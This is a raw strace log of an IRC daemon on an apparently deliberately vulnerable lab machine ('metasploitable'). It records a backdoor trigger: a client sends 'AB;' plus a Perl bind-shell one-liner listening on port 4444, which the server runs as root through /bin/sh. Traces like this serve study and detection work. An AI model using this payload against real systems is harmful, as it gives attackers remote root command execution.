4519  07:33:52.616049 select(1024, [2 3 4 7 9], [], NULL, {0, 490000}) = 1 (in [4], left {0, 440000})

4519  07:33:52.659422 clock_gettime(CLOCK_MONOTONIC, {2442, 476462175}) = 0

4519  07:33:52.659492 recv(4, "PRIVMSG  #testit BLABLALBLALBLALBLALBLALBLALBLALABLLALBLA\n", 8192, 0) = 58

4519  07:33:52.659546 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659579 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659604 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659619 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659633 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659647 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659661 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659675 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659689 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659702 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659716 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659730 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659743 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659757 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659771 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659784 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659798 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659812 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659846 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659888 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659917 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659931 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.659949 gettimeofday({1495625632, 659953}, NULL) = 0

4519  07:33:52.659962 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {0, 870000})

4519  07:33:52.793790 clock_gettime(CLOCK_MONOTONIC, {2442, 610845142}) = 0

4519  07:33:52.793865 time(NULL)        = 1495625632

4519  07:33:52.793891 time(NULL)        = 1495625632

4519  07:33:52.793932 gettimeofday({1495625632, 793935}, NULL) = 0

4519  07:33:52.793944 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:33:52.793996 clock_gettime(CLOCK_MONOTONIC, {2442, 611009019}) = 0

4519  07:33:52.794006 gettimeofday({1495625632, 794010}, NULL) = 0

4519  07:33:52.794016 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:33:52.794054 clock_gettime(CLOCK_MONOTONIC, {2442, 611066893}) = 0

4519  07:33:52.794065 accept(2, 0, NULL) = 5

4519  07:33:52.794086 getpeername(5, {sa_family=AF_INET, sin_port=htons(42707), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:33:52.794117 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:33:52.794129 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:33:52.794142 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:33:52.794154 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:33:52.794165 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:33:52.794176 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:33:52.794208 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:33:52.794287 clock_gettime(CLOCK_MONOTONIC, {2442, 611301708}) = 0

4519  07:33:52.794390 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:33:52.794406 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:33:52.794426 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:33:52.794436 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:33:52.794447 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:33:52.794478 send(6, "\'\227\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:33:52.794547 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:33:52.794604 gettimeofday({1495625632, 794608}, NULL) = 0

4519  07:33:52.794616 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 960000})

4519  07:33:52.828828 clock_gettime(CLOCK_MONOTONIC, {2442, 645848396}) = 0

4519  07:33:52.828849 recv(4, "PRIVMSG  #testit ABCDEFGHIJKLMNOPQRSTUVWXYZ\n", 8192, 0) = 44

4519  07:33:52.828875 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828894 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828908 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828923 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828937 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828951 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828965 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828979 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.828993 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829007 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829020 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829034 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829061 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829105 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829120 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829151 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829165 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829179 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829193 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829207 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829221 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829235 getrusage(RUSAGE_SELF, {ru_utime={0, 10000}, ru_stime={0, 410000}, ...}) = 0

4519  07:33:52.829252 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n", 70, 0) = 70

4519  07:33:52.829320 time(NULL)        = 1495625632

4519  07:33:52.829356 time(NULL)        = 1495625632

4519  07:33:52.829405 gettimeofday({1495625632, 829409}, NULL) = 0

4519  07:33:52.829432 select(1024, [2 6], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:33:52.829531 clock_gettime(CLOCK_MONOTONIC, {2442, 646544234}) = 0

4519  07:33:52.829689 gettimeofday({1495625632, 829695}, NULL) = 0

4519  07:33:52.829703 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {0, 970000})

4519  07:33:52.863857 clock_gettime(CLOCK_MONOTONIC, {2442, 680908041}) = 0

4519  07:33:52.863936 recvfrom(6, "\'\227\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\356\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:33:52.863995 close(6)          = 0

4519  07:33:52.864012 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:33:52.864034 gettimeofday({1495625632, 864038}, NULL) = 0

4519  07:33:52.864046 select(1024, [2 3 4 5 7 9], [5], NULL, {1, 0}) = 2 (in [5], out [5], left {1, 0})

4519  07:33:52.864096 clock_gettime(CLOCK_MONOTONIC, {2442, 681109259}) = 0

4519  07:33:52.864108 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 104, 0) = 104

4519  07:33:52.864167 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:33:52.864197 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:33:52.864218 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:33:52.864230 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:33:52.864246 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 10615

10615 07:33:52.864317 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

10615 07:33:52.864332 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

10615 07:33:52.864342 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10615 07:33:52.864356 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

10615 07:33:52.864473 brk(0)            = 0x80f9000

10615 07:33:52.864496 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.864512 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee3000

10615 07:33:52.864529 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.864546 open("/etc/ld.so.cache", O_RDONLY) = 1

10615 07:33:52.864559 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10615 07:33:52.864578 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7edb000

10615 07:33:52.864589 close(1)          = 0

10615 07:33:52.864600 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.864615 open("/lib/libncurses.so.5", O_RDONLY) = 1

10615 07:33:52.864629 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

10615 07:33:52.864723 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

10615 07:33:52.864741 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eab000

10615 07:33:52.864753 mmap2(0xb7ed8000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7ed8000

10615 07:33:52.864770 close(1)          = 0

10615 07:33:52.864782 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.864796 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10615 07:33:52.864814 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10615 07:33:52.864914 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10615 07:33:52.864932 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ea7000

10615 07:33:52.864944 mmap2(0xb7ea9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ea9000

10615 07:33:52.864960 close(1)          = 0

10615 07:33:52.864971 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.864986 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10615 07:33:52.864999 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10615 07:33:52.865089 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10615 07:33:52.865106 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ea6000

10615 07:33:52.865120 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d57000

10615 07:33:52.865131 mmap2(0xb7ea0000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ea0000

10615 07:33:52.865146 mmap2(0xb7ea3000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ea3000

10615 07:33:52.865160 close(1)          = 0

10615 07:33:52.865182 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d56000

10615 07:33:52.865194 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d566b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10615 07:33:52.865250 mprotect(0xb7ea0000, 4096, PROT_READ) = 0

10615 07:33:52.865288 munmap(0xb7edb000, 29913) = 0

10615 07:33:52.865314 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10615 07:33:52.865328 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

10615 07:33:52.865351 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfaa6c60) = -1 ENOTTY (Inappropriate ioctl for device)

10615 07:33:52.865381 brk(0)            = 0x80f9000

10615 07:33:52.865398 brk(0x80fa000)    = 0x80fa000

10615 07:33:52.865412 brk(0x80fb000)    = 0x80fb000

10615 07:33:52.865428 getuid32()        = 0

10615 07:33:52.865438 getgid32()        = 0

10615 07:33:52.865447 geteuid32()       = 0

10615 07:33:52.865456 getegid32()       = 0

10615 07:33:52.865470 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10615 07:33:52.865484 time(NULL)        = 1495625632

10615 07:33:52.865496 brk(0x80fc000)    = 0x80fc000

10615 07:33:52.865511 brk(0x80fd000)    = 0x80fd000

10615 07:33:52.865531 open("/proc/meminfo", O_RDONLY) = 1

10615 07:33:52.865560 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

10615 07:33:52.865578 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee2000

10615 07:33:52.865590 read(1, "MemTotal:      1035240 kB\nMemFree:        406572 kB\nBuffers:         78412 kB\nCached:         390716 kB\nSwapCached:          0 kB\nActive:         256540 kB\nInactive:       341508 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        406332 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4452 kB\nWriteback:           0 kB\nAnonPages:      128984 kB\nMapped:          52008 kB\nSlab:            19376 kB\nSReclaimable:    10780 kB\nSUnreclaim:       8596 kB\nPageTables:       1976 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

10615 07:33:52.865674 close(1)          = 0

10615 07:33:52.865685 munmap(0xb7ee2000, 4096) = 0

10615 07:33:52.865696 brk(0x80fe000)    = 0x80fe000

10615 07:33:52.865723 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10615 07:33:52.865736 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

10615 07:33:52.865748 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10615 07:33:52.865760 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10615 07:33:52.865772 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

10615 07:33:52.865784 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

10615 07:33:52.865797 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10615 07:33:52.865809 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10615 07:33:52.865822 uname({sys="Linux", node="metasploitable", ...}) = 0

10615 07:33:52.865871 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

10615 07:33:52.865895 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10615 07:33:52.865916 brk(0x8100000)    = 0x8100000

10615 07:33:52.865928 getcwd("/etc/unreal", 4096) = 12

10615 07:33:52.865942 getpid()          = 10615

10615 07:33:52.865959 getppid()         = 4519

10615 07:33:52.865975 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10615 07:33:52.865994 stat64("/sbin/sh", 0xbfaa6c38) = -1 ENOENT (No such file or directory)

10615 07:33:52.866007 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10615 07:33:52.866024 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

10615 07:33:52.866048 socket(PF_FILE, SOCK_STREAM, 0) = 1

10615 07:33:52.866061 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10615 07:33:52.866073 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10615 07:33:52.866094 close(1)          = 0

10615 07:33:52.866106 socket(PF_FILE, SOCK_STREAM, 0) = 1

10615 07:33:52.866116 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

10615 07:33:52.866126 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

10615 07:33:52.866144 close(1)          = 0

10615 07:33:52.866157 open("/etc/nsswitch.conf", O_RDONLY) = 1

10615 07:33:52.866171 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

10615 07:33:52.866192 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7ee2000

10615 07:33:52.866203 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

10615 07:33:52.866253 read(1, "", 4096) = 0

10615 07:33:52.866263 close(1)          = 0

10615 07:33:52.866272 munmap(0xb7ee2000, 4096) = 0

10615 07:33:52.866288 open("/etc/ld.so.cache", O_RDONLY) = 1

10615 07:33:52.866301 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10615 07:33:52.866317 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7edb000

10615 07:33:52.866327 close(1)          = 0

10615 07:33:52.866338 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.866353 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

10615 07:33:52.866368 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 